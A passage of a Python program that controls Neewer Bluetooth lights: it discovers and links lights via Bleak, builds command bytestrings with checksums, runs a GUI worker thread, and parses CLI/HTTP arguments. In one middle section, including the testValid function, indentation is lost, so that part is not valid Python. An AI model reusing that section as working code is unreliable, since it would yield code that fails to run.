    for a in range (0, len(availableLights)):
        printDebugString("Attempting to unlink from light #" + str(a + 1) + " (" + str(a + 1) + " of " + str(len(availableLights)) + " lights to unlink)")
        self.statusBar.showMessage("Attempting to unlink from light #" + str(a + 1) + " (" + str(a + 1) + " of " + str(len(availableLights)) + " lights to unlink)...")
        QApplication.processEvents() # force update to show statusbar progress
        loop.run_until_complete(disconnectFromLight(a)) # disconnect from each light, one at a time
    printDebugString("Closing the program NOW")
# SET UP THE GUI BASED ON COMMAND LINE ARGUMENTS
def setUpGUI(self, **modeArgs):
    """Initialize the GUI from parsed command-line arguments.

    modeArgs["colorMode"] selects the active tab (CCT/HSI/ANM); the
    remaining keys carry the initial slider values for that mode, and the
    matching compute function is called to build and queue the first
    bytestring.
    """
    if modeArgs["colorMode"] == "CCT":
        self.ColorModeTabWidget.setCurrentIndex(0)
        self.Slider_CCT_Hue.setValue(modeArgs["temp"])
        self.Slider_CCT_Bright.setValue(modeArgs["brightness"])
        self.computeValueCCT()
    elif modeArgs["colorMode"] == "HSI":
        self.ColorModeTabWidget.setCurrentIndex(1)
        self.Slider_HSI_1_H.setValue(modeArgs["hue"])
        self.Slider_HSI_2_S.setValue(modeArgs["sat"])
        self.Slider_HSI_3_L.setValue(modeArgs["brightness"])
        self.computeValueHSI()
    elif modeArgs["colorMode"] == "ANM":
        self.ColorModeTabWidget.setCurrentIndex(2)
        self.Slider_ANM_Brightness.setValue(modeArgs["brightness"])
        self.computeValueANM(modeArgs["scene"])
except NameError:
pass # could not load the GUI, but we have already logged an error message
def returnMACname():
    """Return the label used for a light's identifier in debug strings.

    macOS (Darwin) exposes Bluetooth devices by UUID rather than by MAC
    address, so the label differs per platform.
    """
    return "UUID:" if platform.system() == "Darwin" else "MAC Address:"
def testValid(theParam, theValue, defaultValue, startBounds, endBounds):
if theParam == "temp":
if len(theValue) > 1: # if the temp has at least 2 characters in it
theValue = theValue[:2] # take the first 2 characters of the string to convert into int
else: # it either doesn't have enough characters, or isn't a number
printDebugString(" >> error with --temp specified (not enough digits or not a number), so falling back to default value of " + str(defaultValue))
theValue = defaultValue # default to 56(00)K for color temperature
try: # try converting the string into an integer and processing the bounds
theValue = int(theValue) # the value is assumed to be within the bounds, so we check it...
if theValue < startBounds or theValue > endBounds: # the value is not within bounds, so there's an error
if theValue < startBounds: # if the value specified is below the starting boundary, make it the starting boundary
printDebugString(" >> --" + theParam + " (" + str(theValue) + ") isn't between the bounds of " + str(startBounds) + " and " + str(endBounds) + ", so falling back to closest boundary of " + str(startBounds))
theValue = startBounds
elif theValue > endBounds: # if the value specified is above the ending boundary, make it the ending boundary
printDebugString(" >> --" + theParam + " (" + str(theValue) + ") isn't between the bounds of " + str(startBounds) + " and " + str(endBounds) + ", so falling back to closest boundary of " + str(endBounds))
theValue = endBounds
return theValue # return the within-bounds value
except ValueError: # if the string can not be converted, then return the defaultValue
printDebugString(" >> --" + theParam + " specified is not a number - falling back to default value of " + str(defaultValue))
return defaultValue # return the default value
# PRINT A DEBUG STRING TO THE CONSOLE, ALONG WITH THE CURRENT TIME
def printDebugString(theString):
    """Print theString to the console with an HH:MM:SS timestamp, but only
    when the global printDebug flag is enabled."""
    if printDebug == True:
        timeStamp = datetime.now().strftime("%H:%M:%S")
        print("[" + timeStamp + "] - " + theString)
# CALCULATE THE BYTESTRING TO SEND TO THE LIGHT
def calculateByteString(**modeArgs):
    """Compute the command packet for the requested mode and store it in the
    global sendValue.

    modeArgs["colorMode"] selects the packet layout: "CCT" (brightness +
    color temperature), "HSI" (hue split over two bytes + saturation +
    intensity) or "ANM" (brightness + scene number).  Any other mode stores
    the placeholder [0].  The last byte of each packet is its checksum.
    """
    global sendValue
    mode = modeArgs["colorMode"]
    if mode == "CCT":
        # CCT (color balance) mode: 120, 135, 2, brightness, temp, checksum
        packet = [120, 135, 2, int(modeArgs["brightness"]), int(modeArgs["temp"]), 0]
        packet[5] = calculateChecksum(packet)
    elif mode == "HSI":
        # HSI (any color of the spectrum) mode: hue is sent low-byte/high-byte
        hue = int(modeArgs["HSI_H"])
        packet = [120, 134, 4, hue & 255, (hue & 65280) >> 8, int(modeArgs["HSI_S"]), int(modeArgs["HSI_I"]), 0]
        packet[7] = calculateChecksum(packet)
    elif mode == "ANM":
        # ANM (animation/scene) mode: 120, 136, 2, brightness, scene, checksum
        packet = [120, 136, 2, int(modeArgs["brightness"]), int(modeArgs["animation"]), 0]
        packet[5] = calculateChecksum(packet)
    else:
        packet = [0] # unknown mode - store a placeholder value
    sendValue = packet
# RECALCULATE THE BYTESTRING FOR CCT-ONLY NEEWER LIGHTS INTO HUE AND BRIGHTNESS SEPARATELY
def calculateSeparateBytestrings(sendValue):
    """Split a combined CCT packet into stand-alone brightness and hue commands.

    The global CCTSlider selects the result: -1 returns a list with both
    commands [brightness, hue], 1 returns only the brightness command and
    2 returns only the hue command.
    """
    # brightness-only command built from byte 3 of the combined packet
    briCommand = [120, 130, 1, sendValue[3], 0]
    briCommand[4] = calculateChecksum(briCommand)
    # hue (color temperature)-only command built from byte 4 of the combined packet
    hueCommand = [120, 131, 1, sendValue[4], 0]
    hueCommand[4] = calculateChecksum(hueCommand)
    if CCTSlider == -1: # both sliders changed - caller sends both commands
        return [briCommand, hueCommand]
    if CCTSlider == 1: # only the brightness slider moved
        return briCommand
    if CCTSlider == 2: # only the hue slider moved
        return hueCommand
def setPowerBytestring(onOrOff):
    """Store the fixed power command in the global sendValue: the "turn on"
    packet when onOrOff is "ON", the "turn off" packet otherwise."""
    global sendValue
    sendValue = [120, 129, 1, 1, 251] if onOrOff == "ON" else [120, 129, 1, 2, 252]
# RENDER A BYTESTRING AS HUMAN-READABLE STATUS TEXT
def updateStatus(splitString = False, customValue=False):
    """Describe a command bytestring for display.

    splitString=False returns the bytes as one line of hex values (for the
    status bar); splitString=True returns a readable summary of the mode
    the packet encodes (for the table view), or "" when the mode byte is
    not one of 134/135/136.  customValue is the bytestring to render; when
    omitted (left as the False sentinel) the global sendValue is used.
    """
    if customValue is False: # sentinel check with `is`, so falsy bytestrings are never misread
        customValue = sendValue
    if splitString is False: # status-bar form: the bytestring as one long hex line
        # join instead of repeated += - one pass, no quadratic concatenation
        return "".join(" " + str(hex(byteValue)) for byteValue in customValue)
    # table-view form: readable description of the mode encoded in byte 1
    if customValue[1] == 134: # HSI packet: hue is split across bytes 3 (low) and 4 (high)
        return "(HSI MODE):\n H: " + str(customValue[3] + (256 * customValue[4])) + u'\N{DEGREE SIGN}' + " / S: " + str(customValue[5]) + " / I: " + str(customValue[6])
    if customValue[1] == 135: # CCT packet: byte 4 is temperature in hundreds of Kelvin
        return "(CCT MODE):\n TEMP: " + str(customValue[4]) + "00K / BRI: " + str(customValue[3])
    if customValue[1] == 136: # ANM/scene packet
        return "(ANM/SCENE MODE):\n SCENE: " + str(customValue[4]) + " / BRI: " + str(customValue[3])
    return "" # unrecognized mode byte - same as the original's untouched accumulator
# CALCULATE THE CHECKSUM FROM THE BYTESTRING
def calculateChecksum(sendValue):
    """Return the single-byte checksum for a Neewer command bytestring.

    The checksum is the sum of every byte except the last one (the slot the
    checksum itself goes into), reduced modulo 256.  Negative entries are
    treated as signed bytes, i.e. mapped into 0-255 before summing.
    """
    # (x & 255) maps a negative signed byte into 0-255 and is a no-op for
    # values already in range, so the manual "+ 256 if negative" branch and
    # running accumulator collapse into a single masked sum
    return sum(byteValue & 255 for byteValue in sendValue[:-1]) & 255
# FIND NEW LIGHTS
async def findDevices():
    """Scan for nearby Neewer lights and merge them into availableLights.

    A light already in the global list gets its RSSI refreshed and its
    Bleak connection cleared (re-seeing it usually means it disconnected,
    so it must be re-linked); a new light is appended together with any
    saved custom preferences.  Returns "" on a normal finish, or "quit"
    when a shutdown was requested during the scan.
    """
    global availableLights
    printDebugString("Searching for new lights")
    devices = await BleakScanner.discover() # scan all available Bluetooth devices nearby
    # keep only Neewer lights; d.name can be None for anonymous BLE
    # advertisements, so guard before the substring test (the old
    # try/str.index/except ValueError version crashed on a None name)
    currentScan = [d for d in devices if d.name and "NEEWER" in d.name]
    for a in range(len(currentScan)): # scan the newly found NEEWER devices
        newLight = True # initially mark this light as a "new light"
        # check the "new light" against the global list
        for b in range(len(availableLights)):
            if currentScan[a].address == availableLights[b][0].address: # the MAC address matches one already in the global list
                printDebugString("Light found! [" + currentScan[a].name + "] " + returnMACname() + " " + currentScan[a].address + " but it's already in the list. It may have disconnected, so relinking might be necessary.")
                newLight = False # then don't add another instance of it
                # if we found the light *again*, it's most likely the light disconnected, so we need to link it again
                availableLights[b][0].rssi = currentScan[a].rssi # update the RSSI information
                availableLights[b][1] = "" # clear the Bleak connection (as it's changed) to force the light to need re-linking
                break # stop checking once we've found a match
        if newLight == True: # if this light was not found in the global list, then we need to add it
            printDebugString("Found new light! [" + currentScan[a].name + "] " + returnMACname() + " " + currentScan[a].address + " RSSI: " + str(currentScan[a].rssi) + " dBm")
            customPrefs = getCustomLightPrefs(currentScan[a].address, currentScan[a].name)
            availableLights.append([currentScan[a], "", customPrefs[0], [], customPrefs[1], customPrefs[2], True, ["---", "---"]]) # add it to the global list
    if threadAction != "quit":
        return "" # once the device scan is over, set the threadAction to nothing
    else: # if we're requesting that we quit, then just quit
        return "quit"
def getCustomLightPrefs(MACAddress, lightName = ""):
    """Load saved per-light preferences, or model-based defaults.

    Returns a 3-element list: [custom name, allow wider CCT range (bool),
    CCT-only mode (bool)].  Preferences live in a pipe-delimited file named
    after the MAC address (colons removed) inside the light_prefs folder
    next to the program; when no file exists, defaults are chosen from the
    model name (SL80 gets the wider range, SNL660 is CCT-only).
    """
    customPrefsPath = MACAddress.split(":") # take the colons out of the MAC address
    customPrefsPath = os.path.dirname(os.path.abspath(sys.argv[0])) + os.sep + "light_prefs" + os.sep + "".join(customPrefsPath)
    if os.path.exists(customPrefsPath):
        printDebugString("A custom preferences file was found for " + MACAddress + "!")
        # READ THE PREFERENCES FILE INTO A LIST - a context manager guarantees the
        # file handle is closed even if the read raises
        with open(customPrefsPath) as prefsFile:
            customPrefs = prefsFile.read().split("|")
        # CHANGE STRING "Booleans" INTO ACTUAL BOOLEANS
        for b in range(1, 3):
            customPrefs[b] = customPrefs[b] == "True"
    else: # if there is no custom preferences file, still check the name against a list of per-light parameters
        if lightName == "NEEWER-SL80": # we can use extended ranges with the SL80
            customPrefs = ["", True, False]
        elif lightName == "NEEWER-SNL660": # we can ONLY use CCT mode with the SNL-660
            customPrefs = ["", False, True]
        else: # return a blank slate
            customPrefs = ["", False, False]
    return customPrefs
# CONNECT (LINK) TO A LIGHT
async def connectToLight(selectedLight, updateGUI=True):
    """Attach a Bleak client to availableLights[selectedLight] and connect.

    Retries up to maxNumOfAttempts times.  In GUI mode the table row is
    updated with progress and the light's power/channel info is read after
    a successful link; in CLI mode (updateGUI=False) True/False is
    returned instead.  Returns "quit" as soon as a shutdown is requested.
    """
    global availableLights
    isConnected = False # whether or not the light is connected
    returnValue = "" # the value to return to the thread (in GUI mode, a string) or True/False (in CLI mode, a boolean value)
    # FILL THE [1] ELEMENT OF THE availableLights ARRAY WITH THE BLEAK CONNECTION
    if availableLights[selectedLight][1] == "":
        availableLights[selectedLight][1] = BleakClient(availableLights[selectedLight][0])
        await asyncio.sleep(0.25) # wait just a short time before trying to connect
    # TRY TO CONNECT TO THE LIGHT SEVERAL TIMES BEFORE GIVING UP THE LINK
    currentAttempt = 1
    while isConnected == False and currentAttempt <= maxNumOfAttempts:
        if threadAction != "quit":
            printDebugString("Attempting to link to light " + str(selectedLight + 1) + " [" + availableLights[selectedLight][0].name + "] " + returnMACname() + " " + availableLights[selectedLight][0].address + " (Attempt " + str(currentAttempt) + " of " + str(maxNumOfAttempts) + ")")
            try:
                if not availableLights[selectedLight][1].is_connected: # if the current device isn't linked to Bluetooth
                    isConnected = await availableLights[selectedLight][1].connect() # try connecting it (and return the connection status)
                else:
                    isConnected = True # the light is already connected, so mark it as being connected
            except Exception as e:
                printDebugString("Error linking to light " + str(selectedLight + 1) + " [" + availableLights[selectedLight][0].name + "] " + returnMACname() + " " + availableLights[selectedLight][0].address)
                if updateGUI == True:
                    mainWindow.setTheTable(["", "", "NOT\nLINKED", "There was an error connecting to the light, trying again (Attempt " + str(currentAttempt + 1) + " of " + str(maxNumOfAttempts) + ")..."], selectedLight) # there was an issue connecting this specific light to Bluetooh, so show that
                else:
                    returnValue = False # if we're in CLI mode, and there is an error connecting to the light, return False
                currentAttempt = currentAttempt + 1 # only failures consume an attempt
        else:
            return "quit" # a shutdown was requested mid-retry
    if threadAction == "quit":
        return "quit"
    else:
        if isConnected == True:
            printDebugString("Successfully linked to light " + str(selectedLight + 1) + " [" + availableLights[selectedLight][0].name + "] " + returnMACname() + " " + availableLights[selectedLight][0].address)
            if updateGUI == True:
                await getLightChannelandPower(selectedLight) # fill [7] with the power state and channel for the table
                mainWindow.setTheTable(["", "", "LINKED\n" + availableLights[selectedLight][7][0] + " / ᴄʜ. " + str(availableLights[selectedLight][7][1]), "Waiting to send..."], selectedLight) # if it's successful, show that in the table
            else:
                returnValue = True # if we're in CLI mode, and there is no error connecting to the light, return True
        else:
            if updateGUI == True:
                mainWindow.setTheTable(["", "", "NOT\nLINKED", "There was an error connecting to the light"], selectedLight) # there was an issue connecting this specific light to Bluetooh, so show that
            returnValue = False # the light is not connected
    return returnValue # once the connection is over, then return either True or False (for CLI) or nothing (for GUI)
async def readNotifyCharacteristic(selectedLight, diagCommand):
    """Send a diagnostic command to a light and collect its notify reply.

    Subscribes to the light's notify characteristic (replies land in the
    global receivedData via notifyCallback), writes diagCommand up to
    maxNumOfAttempts times until a reply arrives, then unsubscribes.
    Returns the received bytes, or "" if the query could not be made.
    """
    # clear the global variable before asking the light for info
    global receivedData
    receivedData = ""
    try:
        await availableLights[selectedLight][1].start_notify(notifyLightUUID, notifyCallback) # start reading notifications from the light
    except Exception as e:
        return "" # if there is an error starting the characteristic scan, just quit out of this routine
    for a in range(maxNumOfAttempts): # attempt maxNumOfAttempts times to read the characteristics
        try:
            await availableLights[selectedLight][1].write_gatt_char(setLightUUID, bytearray(diagCommand))
        except Exception as e:
            return "" # if there is an error checking the characteristic, just quit out of this routine
        if receivedData != "": # notifyCallback has filled in a reply
            break # we found data, so we can stop checking
        else:
            await asyncio.sleep(0.25) # wait a little bit of time before checking again
    try:
        await availableLights[selectedLight][1].stop_notify(notifyLightUUID) # stop reading notifications from the light
    except Exception as e:
        pass # we will return whatever data remains from the scan, so if we can't stop the scan (light disconnected), just return what we have
    return receivedData
async def getLightChannelandPower(selectedLight):
    """Query a linked light for its power state and current channel.

    Stores the results into availableLights[selectedLight][7]:
    [0] becomes "ON"/"STBY" (or stays "---" when the light doesn't answer)
    and [1] becomes the channel number when one could be read.
    """
    global availableLights
    returnInfo = ["---", "---"] # [power state, channel] defaults when the light doesn't answer
    powerInfo = await readNotifyCharacteristic(selectedLight, [120, 133, 0, 253]) # the power-state query command
    if powerInfo != "" and powerInfo[3] == 1: # reply byte 3 == 1 -> the light reports it is on
        returnInfo[0] = "ON"
        # IF THE LIGHT IS ON, THEN ATTEMPT TO READ THE CURRENT CHANNEL
        chanInfo = await readNotifyCharacteristic(selectedLight, [120, 132, 0, 252]) # the channel query command
        if chanInfo != "": # if we got a result from the query
            try:
                returnInfo[1] = chanInfo[3] # set the current channel to the returned result
            except IndexError:
                pass # the reply was too short, so the channel stays "---"
    elif powerInfo != "" and powerInfo[3] == 2: # reply byte 3 == 2 -> standby
        returnInfo[0] = "STBY"
    availableLights[selectedLight][7][0] = returnInfo[0]
    # NOTE(review): element [1] is the Bleak connection object (or ""), which is
    # never "---", so the first half of this test is always True - it may have
    # been intended to check returnInfo[0] instead; confirm before changing
    if availableLights[selectedLight][1] != "---" and returnInfo[1] != "---":
        availableLights[selectedLight][7][1] = returnInfo[1]
def notifyCallback(sender, data):
    """Bleak notification callback: stash the bytes a light sends back into
    the global receivedData buffer for readNotifyCharacteristic() to pick up."""
    global receivedData
    receivedData = data
# DISCONNECT FROM A LIGHT
async def disconnectFromLight(selectedLight, updateGUI=True):
    """Disconnect the light at index selectedLight from Bluetooth.

    Returns "" in GUI mode; in CLI mode (updateGUI=False) returns True on a
    confirmed disconnect and False when the disconnect raised an error.
    """
    returnValue = "" # same as above, string for GUI mode and boolean for CLI mode, default to blank string
    if availableLights[selectedLight][1] != "": # if there is a Bleak object attached to the light, try to disconnect
        try:
            if availableLights[selectedLight][1].is_connected: # if the current light is connected
                await availableLights[selectedLight][1].disconnect() # disconnect the selected light
        except Exception as e:
            returnValue = False # if we're in CLI mode, then return False if there is an error disconnecting
            printDebugString("Error unlinking from light " + str(selectedLight + 1) + " [" + availableLights[selectedLight][0].name + "] " + returnMACname() + " " + availableLights[selectedLight][0].address)
            print(e)
    try:
        # when element [1] is still the empty string (no Bleak object), the
        # .is_connected access below raises AttributeError - handled underneath
        if not availableLights[selectedLight][1].is_connected: # if the current light is NOT connected, then we're good
            if updateGUI == False:
                returnValue = True # CLI mode: report the successful unlink
            printDebugString("Successfully unlinked from light " + str(selectedLight + 1) + " [" + availableLights[selectedLight][0].name + "] " + returnMACname() + " " + availableLights[selectedLight][0].address)
    except AttributeError:
        printDebugString("Light " + str(selectedLight + 1) + " has no Bleak object attached to it, so not attempting to disconnect from it")
    return returnValue
# WRITE TO A LIGHT - optional arguments for the CLI version (GUI version doesn't use either of these)
async def writeToLight(selectedLights=0, updateGUI=True):
    """Send the current global bytestring (sendValue) to the selected lights.

    In GUI mode the selection is re-read from the table on every pass and
    each light's table row is updated with per-light status.  The loop
    keeps re-sending whenever sendValue changes, and exits roughly 0.4s
    after the last change.  CCT-only lights ([5] flag set) get CCT packets
    split into separate hue/brightness commands and reject HSI/ANM packets.
    Returns "" or "quit" in GUI mode; True/False/0 in CLI mode.
    """
    returnValue = "" # same as above, return value "" for GUI, or boolean for CLI
    startTimer = time.time() # the start of the triggering
    printDebugString("Going into send mode")
    try:
        if updateGUI == True:
            selectedLights = mainWindow.selectedLights() # get the list of currently selected lights from the GUI table
        else:
            if type(selectedLights) is int: # if we specify an integer-based index
                selectedLights = [selectedLights] # convert asked-for light to list
        currentSendValue = [] # initialize the value check
        # if there are lights selected (otherwise just dump out), and the delay timer is less than it's maximum, then try to send to the lights selected
        while (len(selectedLights) > 0 and time.time() - startTimer < 0.4) :
            if currentSendValue != sendValue: # if the current value is different than what was last sent to the light, then send a new one
                currentSendValue = sendValue # get this value before sending to multiple lights, to ensure the same value is sent to each one
                for a in range(len(selectedLights)): # try to write each light in turn, and show the current data being sent to them in the table
                    if availableLights[selectedLights[a]][1] != "": # if a Bleak connection is there
                        try:
                            if availableLights[(int(selectedLights[a]))][5] == True: # if we're using the old style of light
                                if currentSendValue[1] == 135: # if we're on CCT mode
                                    if CCTSlider == -1: # and we need to write both HUE and BRI to the light
                                        splitCommands = calculateSeparateBytestrings(currentSendValue) # get both commands from the converter
                                        # WRITE BOTH LUMINANCE AND HUE VALUES TOGETHER, BUT SEPARATELY
                                        await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(splitCommands[0]), False)
                                        await asyncio.sleep(0.05) # wait 1/20th of a second to give the Bluetooth bus a little time to recover
                                        await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(splitCommands[1]), False)
                                    else: # we're only writing either HUE or BRI independently
                                        await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(calculateSeparateBytestrings(currentSendValue)), False)
                                elif currentSendValue[1] == 129: # we're using an old light, but we're either turning the light on or off
                                    await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(currentSendValue), False)
                                elif currentSendValue[1] == 134: # we can't use HSI mode with this light, so show that
                                    if updateGUI == True:
                                        mainWindow.setTheTable(["", "", "", "This light can not use HSI mode"], int(selectedLights[a]))
                                    else:
                                        returnValue = True # we successfully wrote to the light (or tried to at least)
                                elif currentSendValue[1] == 136: # we can't use ANM/SCENE mode with this light, so show that
                                    if updateGUI == True:
                                        mainWindow.setTheTable(["", "", "", "This light can not use ANM/SCENE mode"], int(selectedLights[a]))
                                    else:
                                        returnValue = True # we successfully wrote to the light (or tried to at least)
                            else: # we're using a "newer" Neewer light, so just send the original calculated value
                                await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(currentSendValue), False)
                            if updateGUI == True:
                                # if we're not looking at an old light, or if we are, we're not in either HSI or ANM modes, then update the status of that light
                                if not (availableLights[(int(selectedLights[a]))][5] == True and (currentSendValue[1] == 134 or currentSendValue[1] == 136)):
                                    if currentSendValue[1] != 129: # if we're not turning the light on or off
                                        mainWindow.setTheTable(["", "", "", updateStatus(True)], int(selectedLights[a]))
                                    else: # we ARE turning the light on or off
                                        if currentSendValue[3] == 1: # we turned the light on
                                            availableLights[int(selectedLights[a])][6] = True # toggle the "light on" parameter of this light to ON
                                            changeStatus = mainWindow.returnTableInfo(selectedLights[a], 2).replace("STBY", "ON")
                                            mainWindow.setTheTable(["", "", changeStatus, "Light turned on"], int(selectedLights[a]))
                                        else: # we turned the light off
                                            availableLights[int(selectedLights[a])][6] = False # toggle the "light on" parameter of this light to OFF
                                            changeStatus = mainWindow.returnTableInfo(selectedLights[a], 2).replace("ON", "STBY")
                                            mainWindow.setTheTable(["", "", changeStatus, "Light turned off\nA long period of inactivity may require a re-link to the light"], int(selectedLights[a]))
                            else:
                                returnValue = True # we successfully wrote to the light
                            if currentSendValue[1] != 129: # if we didn't just send a command to turn the light on/off
                                availableLights[selectedLights[a]][3] = currentSendValue # store the currenly sent value to recall later
                        except Exception as e:
                            if updateGUI == True:
                                mainWindow.setTheTable(["", "", "", "Error Sending to light!"], int(selectedLights[a]))
                    else: # if there is no Bleak object associated with this light (otherwise, it's been found, but not linked)
                        if updateGUI == True:
                            mainWindow.setTheTable(["", "", "", "Light isn't linked yet, can't send to it"], int(selectedLights[a]))
                        else:
                            returnValue = 0 # the light is not linked, even though it *should* be if it gets to this point, so this is an odd error
                startTimer = time.time() # if we sent a value, then reset the timer
            await asyncio.sleep(0.05) # wait 1/20th of a second to give the Bluetooth bus a little time to recover
            if updateGUI == True:
                selectedLights = mainWindow.selectedLights() # re-acquire the current list of selected lights
    except Exception as e:
        printDebugString("There was an error communicating with the light.")
        print(e)
        if updateGUI == True:
            returnValue = False # there was an error writing to this light, so return false to the CLI
    if updateGUI == True:
        if threadAction != "quit": # if we've been asked to quit somewhere else in the program
            printDebugString("Leaving send mode and going back to background thread")
        else:
            printDebugString("The program has requested to quit, so we're not going back to the background thread")
            returnValue = "quit"
    return returnValue
# USE THIS FUNCTION TO CONNECT TO ONE LIGHT (for CLI mode) AND RETRIEVE ANY CUSTOM PREFS (necessary for lights like the SNL-660)
async def connectToOneLight(MACAddress):
    """CLI-mode helper: locate one light by MAC address/UUID and make it the
    only entry in the global availableLights list, with custom prefs applied."""
    global availableLights
    try:
        currentLightToAdd = await BleakScanner.find_device_by_address(MACAddress)
        customLightPrefs = getCustomLightPrefs(currentLightToAdd.address, currentLightToAdd.name)
        # note: this CLI entry has 7 elements - no trailing ["---", "---"] power/channel slot as in GUI mode
        availableLights = [[currentLightToAdd, "", customLightPrefs[0], [], customLightPrefs[1], customLightPrefs[2], True]]
    except Exception as e:
        printDebugString("Error finding the Neewer light with MAC address " + MACAddress)
        print(e)
# THE BACKGROUND WORKER THREAD
def workerThread(_loop):
    """Background loop for the GUI: polls the global threadAction flag and runs
    discovery/connect/send requests on the supplied asyncio event loop, while
    periodically refreshing each light's link status in the table.

    Args:
        _loop: the asyncio event loop used to run the async light operations.
    """
    global threadAction

    if startup_findLights == True: # if we're set to find lights at startup, then automatically set the thread to discovery mode
        threadAction = "discover"

    delayTicks = 1 # count a few ticks before checking light information

    while True:
        # only do the per-light status scan every 12th pass (~3 seconds at 0.25s per tick)
        if delayTicks < 12:
            delayTicks += 1
        elif delayTicks == 12:
            delayTicks = 1
            printDebugString("Background Thread Running")

            # CHECK EACH LIGHT AGAINST THE TABLE TO SEE IF THERE ARE CONNECTION ISSUES
            for a in range(len(availableLights)):
                if threadAction == "": # if we're not sending, then update the light info... (check this before scanning each light)
                    if availableLights[a][1] != "": # if there is a Bleak object, then check to see if it's connected
                        if not availableLights[a][1].is_connected: # the light is disconnected, but we're reporting it isn't
                            mainWindow.setTheTable(["", "", "NOT\nLINKED", "Light disconnected!"], a) # show the new status in the table
                            availableLights[a][1] = "" # clear the Bleak object
                        else:
                            # NOTE(review): element [7] presumably holds (power state, channel)
                            # filled in by getLightChannelandPower() - confirm against that function
                            _loop.run_until_complete(getLightChannelandPower(a))
                            mainWindow.setTheTable(["", "", "LINKED\n" + availableLights[a][7][0] + " / ᴄʜ. " + str(availableLights[a][7][1]), ""], a)

        if threadAction == "quit":
            printDebugString("Stopping the background thread")
            threadAction = "finished" # signal the main thread that we have shut down
            break # stop the background thread before quitting the program
        elif threadAction == "discover":
            threadAction = _loop.run_until_complete(findDevices()) # add new lights to the main array

            if threadAction != "quit":
                mainWindow.updateLights() # tell the GUI to update its list of available lights

                if startup_connectLights == True: # if we're set to automatically link to the lights on startup, then do it here
                    for a in range(len(availableLights)):
                        if threadAction != "quit": # if we're not supposed to quit, then try to connect to the light(s)
                            threadAction = _loop.run_until_complete(connectToLight(a)) # connect to each light in turn
        elif threadAction == "connect":
            selectedLights = mainWindow.selectedLights() # get the list of currently selected lights

            for a in range(len(mainWindow.selectedLights())): # and try to link to each of those lights
                threadAction = _loop.run_until_complete(connectToLight(selectedLights[a]))
        elif threadAction == "send":
            threadAction = _loop.run_until_complete(writeToLight()) # write a value to the light(s) - the selectedLights() section is in the write loop itself for responsiveness

        time.sleep(0.25) # idle a quarter second between polls so this loop doesn't spin the CPU
def processCommands(listToProcess=None):
    """Normalize and parse command-line (or HTTP query) arguments into an action list.

    When called with no (or an empty) list, sys.argv is parsed ("startup mode");
    otherwise the passed list is treated as HTTP request parameters.

    Returns one of:
      ["HTTP", silent]                      - launch the HTTP server
      ["LIST", False]                       - list lights on the CLI, then quit
      ["list"] / ["discover"] / ["link", n] - HTTP-only actions
      [cli, silent, light, mode, ...]       - a light command (CCT/HSI/ANM/ON/OFF)
      []                                    - an HTTP request with no usable parameters
    """
    inStartupMode = False # if we're in startup mode (so report that to the log), start as False initially to be set to True below

    # SET THE CURRENT LIST TO THE sys.argv SYSTEM PARAMETERS LIST IF A LIST ISN'T SPECIFIED
    # SO WE CAN USE THIS SAME FUNCTION TO PARSE HTML ARGUMENTS USING THE HTTP SERVER AND COMMAND-LINE ARGUMENTS
    # (None default replaces the old mutable default list; an empty list behaves identically)
    if listToProcess is None or len(listToProcess) == 0: # if there aren't any elements in the list, then check against sys.argv
        listToProcess = sys.argv[1:] # the list to parse is the system args minus the first one
        inStartupMode = True

    # ADD DASHES TO ANY PARAMETERS THAT DON'T CURRENTLY HAVE THEM AS WELL AS
    # CONVERT ALL ARGUMENTS INTO lower case (to allow ALL CAPS arguments to parse correctly)
    for a in range(len(listToProcess)):
        if listToProcess[a] != "-h" and listToProcess[a][:2] != "--": # if the dashes aren't in the current item (and it's not the -h flag)
            if listToProcess[a][:1] == "-": # if the current parameter only has one dash (typed wrongly)
                listToProcess[a] = "--" + listToProcess[a][1:].lower() # then remove that, and add the double dash and switch to lowercase
            else: # the parameter has no dashes at all, so add them
                listToProcess[a] = "--" + listToProcess[a].lower() # add the dashes + switch to lowercase to properly parse as arguments below
        else: # if the dashes are already in the current item
            listToProcess[a] = listToProcess[a].lower() # we don't need to add dashes, so just switch to lowercase

    # DELETE ANY INVALID ARGUMENTS FROM THE COMMAND LINE BEFORE RUNNING THE ARGUMENT PARSER
    # TO CLEAN UP THE ARGUMENT LIST AND ENSURE THE PARSER CAN STILL RUN WHEN INVALID ARGUMENTS ARE PRESENT
    if inStartupMode == True:
        acceptable_arguments = ["--http", "--cli", "--silent", "--light", "--mode", "--temp", "--hue",
                                "--sat", "--bri", "--intensity", "--scene", "--animation", "--help", "--off", "--on", "--list"]
    else: # if we're doing HTTP processing, we don't need the http, cli, silent and help flags, so toss 'em
        acceptable_arguments = ["--light", "--mode", "--temp", "--hue", "--sat", "--bri", "--intensity",
                                "--scene", "--animation", "--list", "--discover", "--link", "--off", "--on"]

    # KICK OUT ANY PARAMETERS THAT AREN'T IN THE "ACCEPTABLE ARGUMENTS" LIST
    # (iterate backwards so pop() doesn't shift the indexes still to be visited)
    for a in range(len(listToProcess) - 1, -1, -1):
        if not any(x in listToProcess[a] for x in acceptable_arguments): # if the current argument is invalid
            if inStartupMode == True:
                if listToProcess[a] != "-h": # and the argument isn't "-h" (for help)
                    listToProcess.pop(a) # delete the invalid argument from the list
            else: # if we're not in startup mode, then also delete the "-h" flag
                listToProcess.pop(a) # delete the invalid argument from the list

    # IF THERE ARE NO VALID PARAMETERS LEFT TO PARSE, THEN RETURN THAT TO THE HTTP SERVER
    if inStartupMode == False and len(listToProcess) == 0:
        printDebugString("There are no usable parameters from the HTTP request!")
        return []

    # FORCE VALUES THAT NEED PARAMETERS TO HAVE ONE, AND VALUES THAT REQUIRE NO PARAMETERS TO HAVE NONE
    for a in range(len(listToProcess)):
        if listToProcess[a].find("--silent") != -1:
            listToProcess[a] = "--silent"
        elif listToProcess[a].find("--cli") != -1:
            listToProcess[a] = "--cli"
        elif listToProcess[a].find("--http") != -1: # BUGFIX: was "--html", which can never appear here
            listToProcess[a] = "--http"             # (the acceptable-arguments filter above only lets "--http" through)
        elif listToProcess[a].find("--list") != -1:
            listToProcess[a] = "--list"
        elif listToProcess[a].find("--discover") != -1:
            listToProcess[a] = "--discover"
        elif listToProcess[a].find("--off") != -1:
            listToProcess[a] = "--off"
